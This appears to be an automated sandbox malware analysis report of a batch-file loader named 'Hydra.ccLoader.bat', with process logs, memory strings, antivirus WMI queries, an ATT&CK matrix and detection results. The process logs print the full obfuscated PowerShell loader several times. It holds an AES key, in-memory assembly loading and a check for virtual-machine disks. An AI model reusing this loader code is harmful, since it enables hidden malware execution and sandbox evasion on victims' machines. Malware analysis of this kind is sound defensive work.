Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{a7d7aefc-34fa-4c44-83e0-dba733732ecf}	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C type C:\Users\user\Desktop\Hydra.ccLoader.bat>C:\Windows\$rbx-onimai2\$rbx-CO2.bat	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function LaqSe($iUuMH){ $vwFBp=[System.Security.Cryptography.Aes]::Create(); $vwFBp.Mode=[System.Security.Cryptography.CipherMode]::CBC; $vwFBp.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $vwFBp.Key=[System.Convert]::FromBase64String('di4DDcyzTs705Y2cfJCrjbU5+7IUB/rxfDRBd9BuRKs='); $vwFBp.IV=[System.Convert]::FromBase64String('Zryk7n3AWcgs6SOqeB0/YQ=='); $mWNkD=$vwFBp.CreateDecryptor(); $FMJVb=$mWNkD.TransformFinalBlock($iUuMH, 0, $iUuMH.Length); $mWNkD.Dispose(); $vwFBp.Dispose(); $FMJVb;}function ODxLi($iUuMH){ Invoke-Expression '$jKyNf=New-Object System.IO.MemoryStream(,$iUuMH);'.Replace('', ''); Invoke-Expression '$yWDGv=New-Object System.IO.MemoryStream;'.Replace('', ''); Invoke-Expression '$RiWlb=New-Object System.IO.Compression.GZipStream($jKyNf, [IO.Compression.CompressionMode]::Decompress);'.Replace('', ''); $RiWlb.CopyTo($yWDGv); $RiWlb.Dispose(); $jKyNf.Dispose(); $yWDGv.Dispose(); $yWDGv.ToArray();}function Kbrbr($iUuMH,$wjUzC){ Invoke-Expression '$VDuEP=[System.Reflection.Assembly]::Load([byte[]]$iUuMH);'.Replace('', ''); Invoke-Expression '$nGmNE=$VDuEP.EntryPoint;'.Replace('', ''); Invoke-Expression '$nGmNE.Invoke($null, $wjUzC);'.Replace('', '');}$XtHlN = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $XtHlN;$pkwbz=[System.IO.File]::ReadAllText($XtHlN).Split([Environment]::NewLine);foreach ($GxnwH in $pkwbz) { if ($GxnwH.StartsWith('VEYmI')) { $jXznR=$GxnwH.Substring(5); break; }}$ELwUb=[string[]]$jXznR.Split('\');Invoke-Expression '$muS = ODxLi (LaqSe ([Convert]::FromBase64String($ELwUb[0].Replace("#", "/").Replace("@", "A"))));'.Replace('', '');Invoke-Expression '$Ray = ODxLi (LaqSe ([Convert]::FromBase64String($ELwUb[1].Replace("#", "/").Replace("@", "A"))));'.Replace('', '');Invoke-Expression '$Acu = ODxLi (LaqSe ([Convert]::FromBase64String($ELwUb[2].Replace("#", "/").Replace("@", "A"))));'.Replace('', '');Kbrbr $muS $null;Kbrbr $Ray $null;Kbrbr $Acu (,[string[]] (''));	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{d7046f2c-bae2-4413-95a8-3c99656fab22}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function laqse($iuumh){ $vwfbp=[system.security.cryptography.aes]::create(); $vwfbp.mode=[system.security.cryptography.ciphermode]::cbc; $vwfbp.padding=[system.security.cryptography.paddingmode]::pkcs7; $vwfbp.key=[system.convert]::frombase64string('di4ddcyzts705y2cfjcrjbu5+7iub/rxfdrbd9burks='); $vwfbp.iv=[system.convert]::frombase64string('zryk7n3awcgs6soqeb0/yq=='); $mwnkd=$vwfbp.createdecryptor(); $fmjvb=$mwnkd.transformfinalblock($iuumh, 0, $iuumh.length); $mwnkd.dispose(); $vwfbp.dispose(); $fmjvb;}function odxli($iuumh){ invoke-expression '$jkynf=new-object system.io.memorystream(,$iuumh);'.replace('', ''); invoke-expression '$ywdgv=new-object system.io.memorystream;'.replace('', ''); invoke-expression '$riwlb=new-object system.io.compression.gzipstream($jkynf, [io.compression.compressionmode]::decompress);'.replace('', ''); $riwlb.copyto($ywdgv); $riwlb.dispose(); $jkynf.dispose(); $ywdgv.dispose(); $ywdgv.toarray();}function kbrbr($iuumh,$wjuzc){ invoke-expression '$vduep=[system.reflection.assembly]::load([byte[]]$iuumh);'.replace('', ''); invoke-expression '$ngmne=$vduep.entrypoint;'.replace('', ''); invoke-expression '$ngmne.invoke($null, $wjuzc);'.replace('', '');}$xthln = 'c:\users\user\desktop\hydra.ccloader.bat';$host.ui.rawui.windowtitle = $xthln;$pkwbz=[system.io.file]::readalltext($xthln).split([environment]::newline);foreach ($gxnwh in $pkwbz) { if ($gxnwh.startswith('veymi')) { $jxznr=$gxnwh.substring(5); break; }}$elwub=[string[]]$jxznr.split('\');invoke-expression '$mus = odxli (laqse ([convert]::frombase64string($elwub[0].replace("#", "/").replace("@", "a"))));'.replace('', '');invoke-expression '$ray = odxli (laqse ([convert]::frombase64string($elwub[1].replace("#", "/").replace("@", "a"))));'.replace('', '');invoke-expression '$acu = odxli (laqse ([convert]::frombase64string($elwub[2].replace("#", "/").replace("@", "a"))));'.replace('', '');kbrbr $mus $null;kbrbr $ray $null;kbrbr $acu (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function laqse($iuumh){ $vwfbp=[system.security.cryptography.aes]::create(); $vwfbp.mode=[system.security.cryptography.ciphermode]::cbc; $vwfbp.padding=[system.security.cryptography.paddingmode]::pkcs7; $vwfbp.key=[system.convert]::frombase64string('di4ddcyzts705y2cfjcrjbu5+7iub/rxfdrbd9burks='); $vwfbp.iv=[system.convert]::frombase64string('zryk7n3awcgs6soqeb0/yq=='); $mwnkd=$vwfbp.createdecryptor(); $fmjvb=$mwnkd.transformfinalblock($iuumh, 0, $iuumh.length); $mwnkd.dispose(); $vwfbp.dispose(); $fmjvb;}function odxli($iuumh){ invoke-expression '$jkynf=new-object system.io.memorystream(,$iuumh);'.replace('', ''); invoke-expression '$ywdgv=new-object system.io.memorystream;'.replace('', ''); invoke-expression '$riwlb=new-object system.io.compression.gzipstream($jkynf, [io.compression.compressionmode]::decompress);'.replace('', ''); $riwlb.copyto($ywdgv); $riwlb.dispose(); $jkynf.dispose(); $ywdgv.dispose(); $ywdgv.toarray();}function kbrbr($iuumh,$wjuzc){ invoke-expression '$vduep=[system.reflection.assembly]::load([byte[]]$iuumh);'.replace('', ''); invoke-expression '$ngmne=$vduep.entrypoint;'.replace('', ''); invoke-expression '$ngmne.invoke($null, $wjuzc);'.replace('', '');}$xthln = 'c:\windows\$rbx-onimai2\$rbx-co2.bat';$host.ui.rawui.windowtitle = $xthln;$pkwbz=[system.io.file]::readalltext($xthln).split([environment]::newline);foreach ($gxnwh in $pkwbz) { if ($gxnwh.startswith('veymi')) { $jxznr=$gxnwh.substring(5); break; }}$elwub=[string[]]$jxznr.split('\');invoke-expression '$mus = odxli (laqse ([convert]::frombase64string($elwub[0].replace("#", "/").replace("@", "a"))));'.replace('', '');invoke-expression '$ray = odxli (laqse ([convert]::frombase64string($elwub[1].replace("#", "/").replace("@", "a"))));'.replace('', '');invoke-expression '$acu = odxli (laqse ([convert]::frombase64string($elwub[2].replace("#", "/").replace("@", "a"))));'.replace('', '');kbrbr $mus $null;kbrbr $ray $null;kbrbr $acu (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function laqse($iuumh){ $vwfbp=[system.security.cryptography.aes]::create(); $vwfbp.mode=[system.security.cryptography.ciphermode]::cbc; $vwfbp.padding=[system.security.cryptography.paddingmode]::pkcs7; $vwfbp.key=[system.convert]::frombase64string('di4ddcyzts705y2cfjcrjbu5+7iub/rxfdrbd9burks='); $vwfbp.iv=[system.convert]::frombase64string('zryk7n3awcgs6soqeb0/yq=='); $mwnkd=$vwfbp.createdecryptor(); $fmjvb=$mwnkd.transformfinalblock($iuumh, 0, $iuumh.length); $mwnkd.dispose(); $vwfbp.dispose(); $fmjvb;}function odxli($iuumh){ invoke-expression '$jkynf=new-object system.io.memorystream(,$iuumh);'.replace('', ''); invoke-expression '$ywdgv=new-object system.io.memorystream;'.replace('', ''); invoke-expression '$riwlb=new-object system.io.compression.gzipstream($jkynf, [io.compression.compressionmode]::decompress);'.replace('', ''); $riwlb.copyto($ywdgv); $riwlb.dispose(); $jkynf.dispose(); $ywdgv.dispose(); $ywdgv.toarray();}function kbrbr($iuumh,$wjuzc){ invoke-expression '$vduep=[system.reflection.assembly]::load([byte[]]$iuumh);'.replace('', ''); invoke-expression '$ngmne=$vduep.entrypoint;'.replace('', ''); invoke-expression '$ngmne.invoke($null, $wjuzc);'.replace('', '');}$xthln = 'c:\users\user\desktop\hydra.ccloader.bat';$host.ui.rawui.windowtitle = $xthln;$pkwbz=[system.io.file]::readalltext($xthln).split([environment]::newline);foreach ($gxnwh in $pkwbz) { if ($gxnwh.startswith('veymi')) { $jxznr=$gxnwh.substring(5); break; }}$elwub=[string[]]$jxznr.split('\');invoke-expression '$mus = odxli (laqse ([convert]::frombase64string($elwub[0].replace("#", "/").replace("@", "a"))));'.replace('', '');invoke-expression '$ray = odxli (laqse ([convert]::frombase64string($elwub[1].replace("#", "/").replace("@", "a"))));'.replace('', '');invoke-expression '$acu = odxli (laqse ([convert]::frombase64string($elwub[2].replace("#", "/").replace("@", "a"))));'.replace('', '');kbrbr $mus $null;kbrbr $ray $null;kbrbr $acu (,[string[]] (''));	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function laqse($iuumh){ $vwfbp=[system.security.cryptography.aes]::create(); $vwfbp.mode=[system.security.cryptography.ciphermode]::cbc; $vwfbp.padding=[system.security.cryptography.paddingmode]::pkcs7; $vwfbp.key=[system.convert]::frombase64string('di4ddcyzts705y2cfjcrjbu5+7iub/rxfdrbd9burks='); $vwfbp.iv=[system.convert]::frombase64string('zryk7n3awcgs6soqeb0/yq=='); $mwnkd=$vwfbp.createdecryptor(); $fmjvb=$mwnkd.transformfinalblock($iuumh, 0, $iuumh.length); $mwnkd.dispose(); $vwfbp.dispose(); $fmjvb;}function odxli($iuumh){ invoke-expression '$jkynf=new-object system.io.memorystream(,$iuumh);'.replace('', ''); invoke-expression '$ywdgv=new-object system.io.memorystream;'.replace('', ''); invoke-expression '$riwlb=new-object system.io.compression.gzipstream($jkynf, [io.compression.compressionmode]::decompress);'.replace('', ''); $riwlb.copyto($ywdgv); $riwlb.dispose(); $jkynf.dispose(); $ywdgv.dispose(); $ywdgv.toarray();}function kbrbr($iuumh,$wjuzc){ invoke-expression '$vduep=[system.reflection.assembly]::load([byte[]]$iuumh);'.replace('', ''); invoke-expression '$ngmne=$vduep.entrypoint;'.replace('', ''); invoke-expression '$ngmne.invoke($null, $wjuzc);'.replace('', '');}$xthln = 'c:\windows\$rbx-onimai2\$rbx-co2.bat';$host.ui.rawui.windowtitle = $xthln;$pkwbz=[system.io.file]::readalltext($xthln).split([environment]::newline);foreach ($gxnwh in $pkwbz) { if ($gxnwh.startswith('veymi')) { $jxznr=$gxnwh.substring(5); break; }}$elwub=[string[]]$jxznr.split('\');invoke-expression '$mus = odxli (laqse ([convert]::frombase64string($elwub[0].replace("#", "/").replace("@", "a"))));'.replace('', '');invoke-expression '$ray = odxli (laqse ([convert]::frombase64string($elwub[1].replace("#", "/").replace("@", "a"))));'.replace('', '');invoke-expression '$acu = odxli (laqse ([convert]::frombase64string($elwub[2].replace("#", "/").replace("@", "a"))));'.replace('', '');kbrbr $mus $null;kbrbr $ray $null;kbrbr $acu (,[string[]] (''));	Jump to behavior

Source: C:\Windows\System32\dllhost.exe

Code function: 7_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,

7_2_0000000140002300

Source: C:\Windows\System32\dllhost.exe

Code function: 7_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,

7_2_0000000140002300

Source: dwm.exe, 0000000E.00000002.2859012512.00000262EB2B8000.00000004.00000020.00020000.00000000.sdmp, dwm.exe, 0000000E.00000000.1542346354.00000262EB2B8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerd
Source: winlogon.exe, 00000008.00000000.1489181017.000001CA7D6F0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000008.00000002.2793642510.000001CA7D6F0000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000000E.00000002.2865072940.00000262EB6C0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: winlogon.exe, 00000008.00000000.1489181017.000001CA7D6F0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000008.00000002.2793642510.000001CA7D6F0000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000000E.00000002.2865072940.00000262EB6C0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: winlogon.exe, 00000008.00000000.1489181017.000001CA7D6F0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000008.00000002.2793642510.000001CA7D6F0000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000000E.00000002.2865072940.00000262EB6C0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: ?Program Manager
Source: winlogon.exe, 00000008.00000000.1489181017.000001CA7D6F0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000008.00000002.2793642510.000001CA7D6F0000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000000E.00000002.2865072940.00000262EB6C0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\winlogon.exe

Code function: 8_3_000001CA7D1C2AF0 cpuid

8_3_000001CA7D1C2AF0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\$nya-iM0vfZcH VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\$nya-iM0vfZcH VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation

Source: C:\Windows\System32\dllhost.exe

Code function: 7_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,

7_2_0000000140002300

Source: C:\Windows\System32\winlogon.exe

Code function: 8_2_000001CA7D1E8090 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

8_2_000001CA7D1E8090

Source: dllhost.exe

Binary or memory string: MsMpEng.exe

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	131 Windows Management Instrumentation	1 Scripting	1 DLL Side-Loading	1 Obfuscated Files or Information	11 Input Capture	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	12 Native API	1 DLL Side-Loading	1 Access Token Manipulation	1 Timestomp	LSASS Memory	2 File and Directory Discovery	Remote Desktop Protocol	11 Input Capture	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	12 Command and Scripting Interpreter	1 Scheduled Task/Job	713 Process Injection	1 DLL Side-Loading	Security Account Manager	133 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Scheduled Task/Job	Login Hook	1 Scheduled Task/Job	1 File Deletion	NTDS	251 Security Software Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	2 PowerShell	Network Logon Script	Network Logon Script	21 Masquerading	LSA Secrets	2 Process Discovery	SSH	Keylogging	13 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Modify Registry	Cached Domain Credentials	131 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	131 Virtualization/Sandbox Evasion	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Access Token Manipulation	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	713 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 Hidden Files and Directories	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Hydra.ccLoader.bat	0%	ReversingLabs

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Windows\$nya-onimai2\MzWhoQ.exe	100%	Joe Sandbox ML
C:\Windows\$nya-onimai2\MzWhoQ.exe	5%	ReversingLabs

Source	Detection	Scanner	Label
https://excel.office.comSRD1%	0%	Avira URL Cloud	safe
https://outlook.comSRD1-	0%	Avira URL Cloud	safe
https://powerpoint.office.comSRD13	0%	Avira URL Cloud	safe
https://excel.office.comcom	0%	Avira URL Cloud	safe
http://osoft.co_2010-06X	0%	Avira URL Cloud	safe
https://word.office.comSRD1#	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
